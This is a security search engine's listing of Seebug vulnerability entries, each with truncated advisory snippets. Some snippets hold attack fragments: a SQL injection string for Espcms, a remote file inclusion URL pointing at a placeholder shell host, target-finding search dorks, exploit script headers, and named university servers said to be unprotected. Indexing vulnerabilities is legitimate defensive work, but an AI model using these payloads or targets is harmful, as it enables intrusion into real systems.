Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2021/05/17 12:0 a.m.198 views

XStream远程代码执行漏洞(CVE-2021-29505)

CVE-2021-29505 Vulnerability CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack. Affected Versions All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's...

6.5CVSS0.6AI score0.77735EPSS
Exploits1
seebug.org
seebug.org
added 2017/04/05 12:0 a.m.198 views

Broadcom: Heap overflow in "wl_run_escan" when handling WLC_GET_VALID_CHANNELS ioctl results(CVE-2017-0568)

Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is use...

7.6CVSS7.2AI score0.01496EPSS
Exploits1
seebug.org
seebug.org
added 2016/03/29 12:0 a.m.198 views

phpshe v1.1 任意文件上传漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/07/17 12:0 a.m.198 views

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl inphex PHPizabi v0.848b C1 HFP1 Remote Code Execution http://www.dz-secure.com/tools/1/WebESploit.pl.txt if you are seeking for a partner to work on some projects just send an email inphex0 at gmail dot com system/vcronproc.php if...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/03 12:0 a.m.198 views

XOOPS Module Repository ViewCat.PHP SQL注入漏洞

XOOPS Module Repository是一款基于PHP的WEB应用程序。 XOOPS Module Repository不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息。 问题是'ViewCat.PHP'脚本对用户提交的'cid'参数缺少过滤,提交恶意SQL代码作为参数数据,可导致更改原来的SQL逻辑,获得敏感信息。 Xoops Module Repository 目前没有解决方案提供: http://www.xoops.org/modules/repository/ http://www.sebug.net/show-exp-1622.html...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/16 12:0 a.m.198 views

Bingo News BP_ncom.PHP远程文件包含漏洞

BinGoPHP是一款基于PHP的WEB应用程序。 BinGoPHP不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'BPncom.PHP'脚本对用户提交的'bnrep'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 BinGoPHP BinGoPHP 3.01 http://bingophp.free.fr/ http://www.example.com/Script Path/bpncom.php?bnrep=http://SHELLURL.COM?...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2018/06/08 12:0 a.m.197 views

Linux ext4: out-of-bounds memcpy via non-inline system.data xattr(CVE-2018-11412)

ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the iblock field in the inode which normally contains a list of blocks instead,...

0.2AI score0.16352EPSS
Exploits4
seebug.org
seebug.org
added 2017/02/13 12:0 a.m.197 views

Apache Tomcat information disclosure Vulnerability, CVE-2016-6816)

Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.0.M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0.RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47 Earlier, unsupported versions may also be affected...

6.8CVSS8.5AI score0.39633EPSS
Exploits6
seebug.org
seebug.org
added 2016/01/20 12:0 a.m.197 views

ecshop商城系统 delete_cart_goods.php文件SQL注入漏洞

0x01 框架介绍 商城网站建设-damall多功能商城建站系统,支持B2C2C,O2O模式...DaMall商城建站系统采用强劲的.NET企业级平台研发,可兼容多行业、多模式的业务特点以及扩展需求。 官方主页:http://www.bg68.com 0x02 漏洞细节 漏洞页面: http://mall.bg68.com/httphandler/getdata.ashx 参数brandid 部分用户案例: http://mall.hicay.com/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ash...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/09/25 12:0 a.m.197 views

Espcms v5.0 /index.php SQL注入漏洞

构造www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema.tables where tableschema=database limit 0,1,floorrand02x from informationschema.tables group by xa%23...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/11/13 12:0 a.m.197 views

CUPS Filter Bash Environment Variable Code Injection

No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initializeinf...

10CVSS9.7AI score0.99999EPSS
Exploits147
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.197 views

AlstraSoft AskMe Pro <= 2.1 - Multiple SQL Injection Vulnerabilities

No description provided by source. -+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By: t0pP8uZz...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/11/09 12:0 a.m.197 views

coremail任意文件读取漏洞

简要描述: coremail在实现上存在缺陷,利用80sec发布的xml解析漏洞可以读取服务器上任意文件,包括服务器配置文件和敏感的数据库文件,结合上下文逻辑可能可以获得更高权限,影响所有使用coremail的用户 详细说明: coremail服务在接受和传递参数时使用的是xml的格式进行数据传递,但是根据80sec的安全公告,如果服务端在处理xml数据时格式不对就会导致安全漏洞,使用应用上下文的权限来获取任意文件内容,结合逻辑可能可以得到更多的权限 漏洞证明: 神奇的代码哦,就是简单的在xml头部附加我们的恶意就可以了 POST...

7AI score
Exploits0
seebug.org
seebug.org
added 2006/07/30 12:0 a.m.197 views

Mambo User Home Pages Component &lt;= 0.5 Remote Include Vulnerability

No description provided by source. Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca a...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2017/09/21 12:0 a.m.196 views

Tomcat information disclosure Vulnerability(CVE-2017-12616 )analysis

Several recent Tomcat CVE CVE-2017-5664 Tomcat Security Constraint Bypass CVE-2017-12615 remote code execution vulnerability CVE-2017-12616 information disclosure vulnerability Common Is tasteless With JspServlet and DefaultServlet about the system. CVE-2017-12615 this remote code execution are...

6.8CVSS8.5AI score0.99607EPSS
Exploits20
seebug.org
seebug.org
added 2017/04/10 12:0 a.m.196 views

PHPCMS v9 wap module SQL injection

Suspicious of the function 1. localhost/phpcms/modules/attachment/attachments. php file of the first 241GET submitted to the src variable to bring the saferelace function, and now we're into this damn filter function to see what it's doing 2. The filter function profile and bypass...

8AI score
Exploits0
seebug.org
seebug.org
added 2016/02/18 12:0 a.m.196 views

NS-ASG 应用安全网关 resetpwd.php等10处 SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/11/13 12:0 a.m.196 views

Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash

No description provided by source. Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is that the tool simply scans t...

10CVSS7.8AI score0.64326EPSS
Exploits16
seebug.org
seebug.org
added 2008/06/24 12:0 a.m.196 views

Joomla Component com_facileforms 1.4.4 RFI Vulnerability

No description provided by source. Title: Joomla Component ComFacileforms ================================================================ + Author : Dr.Kacak + Special Thankz : KnocKout and all my friends + System 0VerfL0verZ ================================================================= Scri...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/14 12:0 a.m.195 views

pigcms id参数SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/11/14 12:0 a.m.195 views

WebSphere “Java 反序列化”过程远程命令执行漏洞

满足此漏洞的环境配置 漏洞源头commons-collections.jar 开启的SOAP端口8880. /opt/IBM/WebSphere/AppServer/properties/wsadmin.properties 测试websphere的环境版本号7.0.0.11,目前最新的版本是8.5.5 漏洞影响 ZoomEye 团队针对全球开放8880端口的289.6万服务器进行了漏洞验证,已经确认其中963台服务器存在该风险 关联漏洞链接 1. JBoss “Java 反序列化”过程远程命令执行漏洞 https://www.sebug.net/vuldb/ssvid-89723 2...

7AI score
Exploits0
seebug.org
seebug.org
added 2015/09/25 12:0 a.m.195 views

Discuz x3.2前台GET型SQL注入漏洞(绕过全局WAF)

/source/include/misc/miscstat.php 46行: if!empty$GET'xml' $xaxis = ''; $graph = array; $count = 1; $begin = dgmdate$beginunixstr, 'Ymd'; $end = dgmdate$endunixstr, 'Ymd'; $field = ''; if!empty$GET'merge' ifempty$GET'types' $GET'types' = arraymerge$cols'login', $cols'forum', $cols'tgroup',...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.195 views

Python socket.recvfrom_into() - Remote Buffer Overflow

No description provided by source. !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912...

7.5CVSS0.6AI score0.28319EPSS
Exploits7
seebug.org
seebug.org
added 2013/06/16 12:0 a.m.195 views

正方教务管理系统存在XSS漏洞可威胁所有登陆用户

简要描述: 所有登陆正方教务系统的用户都可能受到该漏洞威胁。 详细说明: 登陆正方教务系统后,每个用户的首页为用户公告栏。 教师具有修改/添加公告栏的内公告的权限,而此处存在XSS漏洞。 漏洞证明: 使用任意一位教师账号登陆(教师账号怎么获得?自己想办法吧,不过目测不少老师都用着默认密码没有修改): 点击公用信息,教务公告: 这里,公告标题可以随意发挥,我们来段弹窗试试: 这样就成功地增加了一条公告,默认是全校所有用户可见。同时还可以选择该条消息面向的对象(某个学院所有用户或者某位老师),从而实现XSS炸弹的定点爆破: 换个用户登录系统,就可以看到如下提示:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/08/26 12:0 a.m.194 views

Organic Technologies CMS productos.php parameter id SQL injection vulnerability

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/05/05 12:0 a.m.194 views

大米CMSFV5.53遍历目录

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/23 12:0 a.m.194 views

用友致远A6协同系统 /yyoa/HJ/iSignatureHtmlServer.jsp 文件 SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/17 12:0 a.m.194 views

Siteserver 内容管理系统 /livefiles/pages/inner/userlist.aspx SQL 注入

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/12/09 12:0 a.m.194 views

libreport信息泄露漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/10/25 12:0 a.m.194 views

Ingo Procmail驱动Shell命令执行漏洞

Ingo是一款邮件过滤规则管理器,集成于Horde和IMP Webmail客户端。 Ingo的procmail驱动没有正确地转义文件夹名称,远程攻击者可能利用此漏洞执行任意Shell命令。 Horde Ingo 1.1.1 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: ftp://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz http://ftp.horde.org/pub/ingo/ingo-h3-1.1.2.tar.gz...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/09/15 12:0 a.m.194 views

PhotoPost &lt;= 4.6 (PP_PATH) Remote File Include Vulnerability

No description provided by source. ==================================================================== PhotoPost = 4.6 PPPATH Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz http://www.popphoto.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/15 12:0 a.m.193 views

泛微oa /webservice/upload.php /webservice/upload/upload.php 等多处任意文件上传

任意文件上传共四处,属于同一个漏洞 文件位置 /webservice/upload.php /webservice/upload/upload.php /webservice-json/upload/upload.php /webservice-xml/upload/upload.php 四处都有如下代码 没有对文件有任何验证,无须登陆 文件上传之后的位置是: $path = $ATTACHPATH.$attachmentID; $fileName = $path."/".$FILES'file''name'; moveuploadedfile $FILES'file''tmpname'...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/07/01 12:0 a.m.193 views

IIS 系列 Http.sys 处理 Range 整数溢出漏洞

一、漏洞概要 2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。 漏洞描述Http.sys 是一个位于 Windows 操作系统核心组件,能够让任何应用程序通过它提供的接口,以 Http 协议进行信息通讯。微软在 Windows 2003 Server 里引进了新的 HTTP API 和内核模式驱动 Http.sys,目的是使基于 Http 服务的程序更有效率。其实在 Windows XP 安装 SP2 后,Http.sys...

10CVSS9.2AI score0.99999EPSS
Exploits16
seebug.org
seebug.org
added 2014/07/02 12:0 a.m.193 views

PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/33525/info PerlSoft Gästebuch is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input. Note that a...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.193 views

JBoss, JMX Console, misconfigured DeploymentScanner

No description provided by source. !/usr/bin/perl Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner Date: Oct 3 2011 Author: y0ug at codsec.com Version: Tested on: Linux CVE : CVE-2010-0738 POC against misconfigured JBoss JMX Console It use the addUrl method in DeploymentScanner...

5CVSS0.2AI score0.79415EPSS
Exploits28
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.194 views

Joomla Template BizWeb com_community Persistent XSS Vulnerability

No description provided by source. 1 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Joomla comcommunity Persistent Xss Vulnerability Date : june, 21 2010 Critical Level : HIGH Vendor Url : http://styleware.eu/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/09/17 12:0 a.m.193 views

Microsoft IIS交换数据流绕过认证漏洞(MS10-065)

BUGTRAQ ID: 41314 CVE ID: CVE-2010-2731 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS没有正确地处理目录的基础认证,远程攻击者可以在请求的目录名后附加NTFS流名称和流类型(:$i30:$INDEXALLOCATION)绕过认证访问受保护的目录。 Microsoft IIS 5.1 厂商补丁: Microsoft --------- Microsoft已经为此发布了一个安全公告(MS10-065)以及相应补丁:...

6.8CVSS6.8AI score0.31118EPSS
Exploits3
seebug.org
seebug.org
added 2009/12/22 12:0 a.m.193 views

resin 3.1.1 跨站脚本漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/03/15 12:0 a.m.193 views

NewsReactor 20070220 Article Grabbing Remote BoF Exploit (1)

No description provided by source. / NewsReactor 20070220 Article Grabbing Remote Buffer Overflow Exploit 1 &nbs...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/05/21 12:0 a.m.192 views

方正论文授权提交系统后台管理员登陆SQL注入漏洞/防范绕过/拖库/挂马隐患

简要描述: 在母校网站上偶尔发现论文提交系统存在明显漏洞,度娘一下发现这个系统普及率较广,影响大学很多,所有学位论文可以任意下载,学生几年的辛苦可能被人轻松搞去,去年10月份已经有人在乌云提过,但是仍然有很多学校没有防范过滤,已经添加过滤的也可以轻松绕过,一旦绕过,由于文件上传漏洞可以直接挂马 详细说明: 已经验证过的影响学校如下: 云南大学(未作防护)http://202.203.222.222/tasi/admin.asp?lang=gb 华南师范大学增城学院(未作防护)http://lib2.scnuzc.cn/tasi/admin/login.asp...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.192 views

phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability

No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie = 3.0.2 BEAUTPATH Remote File Include Vulnerability + + + - Script name: phpCodeGenie v. 3.0.2 - Script site: http://sourceforge.net/projects/phpcodegenie/ + + + - Find by: Kacper a.k.a Rahim +...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/11/29 12:0 a.m.192 views

Apache Tomcat 拒绝服务漏洞(CVE-2012-5568)

Bugtraq ID:56686 CVE ID:CVE-2012-5568 Apache Tomcat是一款开放源码的JSP应用服务器程序。 Apache Tomcat存在一个安全漏洞,攻击者缓慢的连续发送头字段接着头字段请求,可导致服务器消耗系统资源,如线程资源,造成拒绝服务攻击。 Slowloris拒绝服务攻击工具可触发此漏洞。 0 Apache Software Foundation Tomcat 7.0.x Apache Software Foundation Tomcat 6.0.x Apache Software Foundation Tomcat 5.x Apache...

5CVSS7.5AI score0.09588EPSS
Exploits2
seebug.org
seebug.org
added 2011/05/08 12:0 a.m.192 views

Tinyproxy 'conf.c'整数溢出安全绕过漏洞

Bugtraq ID: 47715 CVE ID:CVE-2011-1499 Tinyproxy是一个小型的基于GPL的HTTP/SSL代理程序。 Tinyproxy在子网掩码生成实现上存在一个错误,当配置允许网络段时如"Allow 192.168.0.0/24"相对与默认的"Allow 127.0.0.1",会允许任意IP地址连接,使其成为一个开放代理。如果配置使用一个或多个使用IP段的Allow语句,就会发生这种情况。 Banu Systems Private Limited Tinyproxy 1.8.2 厂商解决方案 Tinyproxy 1.8.3已经修复此漏洞,建议用户下载使用...

2.6CVSS0.4AI score0.01755EPSS
Exploits1
seebug.org
seebug.org
added 2010/05/13 12:0 a.m.192 views

MySQL COM_FIELD_LIST命令绕过权限检查漏洞

BUGTRAQ ID: 40109 CVE ID: CVE-2010-1848 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 MySQL在处理COMFIELDLIST命令的表格名称参数时没有正确的执行权限检查,对一个表格拥有DELETE或SELECT权限的认证用户可以读取或删除其他表格的内容。 MySQL 5.1/5.0 厂商补丁: Oracle ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://bugs.mysql.com/bug.php?id=53371...

6.5CVSS9.5AI score0.03119EPSS
Exploits1
seebug.org
seebug.org
added 2008/09/03 12:0 a.m.192 views

eWebEditorNet upload.aspx 上传漏洞

WebEditorNet 主要是一个upload.aspx文件存在上传漏洞。 form id="post" encType="server" "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript" 只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click;满足条件达到上传木马的效果。成功以后查看源代码 a "lbtnUpload" "javascript:doPostBack'lbtnUpload',''"/script 'javascript'...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/29 12:0 a.m.191 views

MS14-058 Windows内核提权漏洞 (CVE-2014-4113)

No description provided by source...

7.2CVSS8.3AI score0.87042EPSS
Exploits22
seebug.org
seebug.org
added 2015/05/12 12:0 a.m.191 views

CmsTop媒体版中某处sql注入漏洞

简要描述: sql注入漏洞 详细说明: 可以直接修改 管理员密码。 问题出现在 uc.php接口中,没有正确的判断UC接口是否开启,而key又是默认的。 因为代码中自己关闭了GPC,所以会导致注入。 $set= setting'member'; $set'ucdbtablepre' = ''.$set'ucdbname'.'.'.$set'ucdbtablepre'; $set = arraychangekeycase$set, CASEUPPER; foreach$set as $k = $v ifpregmatch'/^UC/',$k define$k,$v;...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/02/03 12:0 a.m.191 views

BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability

No description provided by source. BookmarkX scriptPowered by GengoliaWebStudioSQL Injection AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "2007 BookmarkX script" DORKS 2 : Powered by GengoliaWebStudio DORK 3 : allinurl :"index.php?menu=showtopic" EXPLOIT :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/01/11 12:0 a.m.191 views

CherryPy Cookie会话Id信息泄露漏洞

BUGTRAQ ID: 27181 CherryPy是Python编写的面向对象的HTTP框架。 CherryPy在处理Cookie数据时存在漏洞,远程攻击者可能利用此漏洞访问系统上的任意文件。 如果用户通过cookie提供了恶意的会话ID的话,且服务器在使用基于文件的会话,应用程序就可能引用会话目录之外的文件(文件名以SESSIONPREFIX开始)。 cherrypy.org CherryPy 3.0.2 cherrypy.org CherryPy 2.1.1 cherrypy.org ------------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2018/07/09 12:0 a.m.190 views

Aurora IDEX Membership(IDXM), ERC20 Token, allows attackers to acquire contract ownership (CVE-2018–10666)

Abstract I found a new vulnerability in smart contract of IDXM Token CVE-2018–106661. Attackers can acquire contract ownership because the setOwner function is delcared as public. A new owner can subsequently bypass intended access restrictions by, for example, calling uploadBalances. Details In...

3.1AI score0.00971EPSS
Exploits1
Total number of security vulnerabilities5000